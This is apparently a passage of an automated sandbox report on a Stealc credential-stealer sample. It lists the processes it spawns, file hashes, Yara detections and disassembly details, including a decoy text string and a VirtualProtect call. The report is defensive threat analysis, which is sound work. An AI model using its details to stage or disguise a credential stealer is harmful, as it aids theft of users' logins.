Description: Yara detected Credential Stealer, Source: 00000021.00000003.3052777343.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3099529730.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:33:50
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Imagebase:	0xda0000
File size:	660'480 bytes
MD5 hash:	BDF3C509A0751D1697BA1B1B294FD579
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 62%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:33:50
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:33:53
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe"
Imagebase:	0x940000
File size:	334'848 bytes
MD5 hash:	FBA8F56206955304B2A6207D9F5E8032
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 75%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:33:56
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Imagebase:	0xda0000
File size:	660'480 bytes
MD5 hash:	BDF3C509A0751D1697BA1B1B294FD579
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.2981305297.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3098957154.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3127124077.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3126824181.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3048486160.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3147801023.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.2993220330.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3156872332.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.2954411937.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.2953800369.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.2930322210.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:33:57
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 272
Imagebase:	0xf50000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:33:59
Start date:	01/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x30000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	07:33:59
Start date:	01/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x560000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	07:33:59
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1001425001\shop.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Imagebase:	0x980000
File size:	665'088 bytes
MD5 hash:	E3D038EE8743EEB4759105852F8C9973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 53%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	07:33:59
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	07:34:05
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe"
Imagebase:	0x400000
File size:	1'690'066 bytes
MD5 hash:	0F4AF03D2BA59B5C68066C95B41BFAD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 11%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	07:34:07
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1001425001\shop.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Imagebase:	0x980000
File size:	665'088 bytes
MD5 hash:	E3D038EE8743EEB4759105852F8C9973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	07:34:07
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1001425001\shop.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Imagebase:	0x980000
File size:	665'088 bytes
MD5 hash:	E3D038EE8743EEB4759105852F8C9973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:34:08
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe"
Imagebase:	0x2f0000
File size:	2'126'336 bytes
MD5 hash:	E71C5AEE12EE323FC4F40010437D4186
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000031.00000002.3155168475.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000031.00000002.3149193410.00000000002F1000.00000040.00000001.01000000.0000001D.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000031.00000003.3036164555.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 42%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	07:34:08
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1001425001\shop.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Imagebase:	0x980000
File size:	665'088 bytes
MD5 hash:	E3D038EE8743EEB4759105852F8C9973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3284579257.000000000165F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3178681399.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3134934395.0000000001652000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3313436090.000000000165F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3170492805.0000000001657000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3237340411.0000000001646000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3237340411.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3301700875.000000000165F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3271528231.000000000165F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3091934423.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3262647294.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3266871838.000000000165F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3314956401.000000000165F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3274426173.000000000165F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3261461567.0000000001652000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3137226821.0000000001656000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3086928884.0000000001652000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3137274134.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3161598485.0000000001655000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000032.00000003.3292216008.000000000165F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Function 04B50B29 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731703212.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6868aff66be3c21249a46169dcbbcaaddb64ae92c5de6f3c372bb6c916086175
Instruction ID: 65f0f85acc87de8a79fb8043c872d1c73043b07043af6a79c347c025c032816a
Opcode Fuzzy Hash: 6868aff66be3c21249a46169dcbbcaaddb64ae92c5de6f3c372bb6c916086175
Instruction Fuzzy Hash: 713128EF34D1107EA102A5815B54BFABB6EE6C333073184BAF803CB512F2D45A4A7171

Function 04B50B44 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731703212.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8ebd533d86b762daeceadbf4187b25bc2434da7e6d2b591fdd6530ecc384a4
Instruction ID: 2f6451013101b9dbe30c024c58a5a84a9b3989a4481dc98477a6e7b6da4e6937
Opcode Fuzzy Hash: 7a8ebd533d86b762daeceadbf4187b25bc2434da7e6d2b591fdd6530ecc384a4
Instruction Fuzzy Hash: EC2193FB3892157E7142A5812B54AFABB6EE6C3370330847AF803C6916E6D55E4E3531

Function 04B50B6D Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731703212.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a57e49137cc5db1398840e38ef4d4eed2fef68adf340d86f569cb2e033257d44
Instruction ID: 0f153ca17370bcefc9fb84236683a270059fc39e77f8431b482218c00042ff24
Opcode Fuzzy Hash: a57e49137cc5db1398840e38ef4d4eed2fef68adf340d86f569cb2e033257d44
Instruction Fuzzy Hash: CD1182EB2891147E7142A5812B14EFBBB6EE5C3770330C47AF807C6916E2C55A4E3571

Function 04B50B76 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731703212.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70223caa082295a149299011e58202c2bd951a372a15118a847337d0898fae9d
Instruction ID: ae3722a6430022c0b2a7f9101a1fa9cf9477df1eea3a05d1ea1527894b2bdf1b
Opcode Fuzzy Hash: 70223caa082295a149299011e58202c2bd951a372a15118a847337d0898fae9d
Instruction Fuzzy Hash: B01191FB28D2107E7042A5852B14EFABB2EE6C3770331C47AF803CA506E6C55A4E3531

Function 04B50B90 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731703212.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de1cf7a7b0963ce935b8e247fb2dd77c5a88c5e6fce7cfe199150b12dfc9a15
Instruction ID: 9b9e0804f793886dd45c9697e4ae6e1558f582cfb3b7abd1b7615468299f8880
Opcode Fuzzy Hash: 5de1cf7a7b0963ce935b8e247fb2dd77c5a88c5e6fce7cfe199150b12dfc9a15
Instruction Fuzzy Hash: A2113CFB2491107E7142A5816B14AFAAB7EE5C3770331847AF802C6906F6D55E4E7531

Function 04B50BA1 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731703212.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abaff9498e7f23d0e653256bcb10e2d01e1669c24feb175a16f2c7a3f70b37e6
Instruction ID: 3618490ce12997a54b10e05f95ccbe378f5dcab47cb3448db208e5e0618b69e3
Opcode Fuzzy Hash: abaff9498e7f23d0e653256bcb10e2d01e1669c24feb175a16f2c7a3f70b37e6
Instruction Fuzzy Hash: 4B118BFB28D2147E7142A5812B54AFAAB7EE6C7730331C47AF802D6906E2C54E4E7271

Function 04B50BE1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731703212.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9c8f6b00e91d3b204589c4632ebd682ffefd6ee3cffacfa98c26bd7707220e5
Instruction ID: 0123e6e7a4ccd1058f5f8cf2cdafb430af7b4a475af7f9fac21a359497c841ab
Opcode Fuzzy Hash: f9c8f6b00e91d3b204589c4632ebd682ffefd6ee3cffacfa98c26bd7707220e5
Instruction Fuzzy Hash: ADF0F4FB64D1107DB14294916B50BFAAB6EE5C7730332847BF843C6446E2861A4B7231

Function 04B50BF1 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731703212.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f899d6503359c6b4e94b57d822674f52855a55d811ac44b03eea59c6911ddac3
Instruction ID: 70a7b00611c769c08f32ee49b546da900689b2912fe959c413b6adad74213936
Opcode Fuzzy Hash: f899d6503359c6b4e94b57d822674f52855a55d811ac44b03eea59c6911ddac3
Instruction Fuzzy Hash: 62F06DFB64D1107E714294926B54AFBAA6EE5C3B30332C83AF847C2406E2854A4B2271

Analysis Process: stealc_default2.exePID: 6660, Parent PID: 1620COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	41

Executed Functions

Function 00F145C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F145CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F145D7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F145E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F145ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F145F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00F269FB), ref: 00F14607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00F269FB), ref: 00F1460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F1461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F14627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F14632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F1463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F14648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F1465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F14667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F14672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F1467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00F269FB), ref: 00F14688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F146B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F146BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F146C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F146D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F146DD
strlen.MSVCRT ref: 00F146F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F14718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F14723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F1472E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F14739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F14744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F14754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F1475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F1476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F14775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00F14780
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00F1479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F145F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F145DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F145C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F145E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F145D2
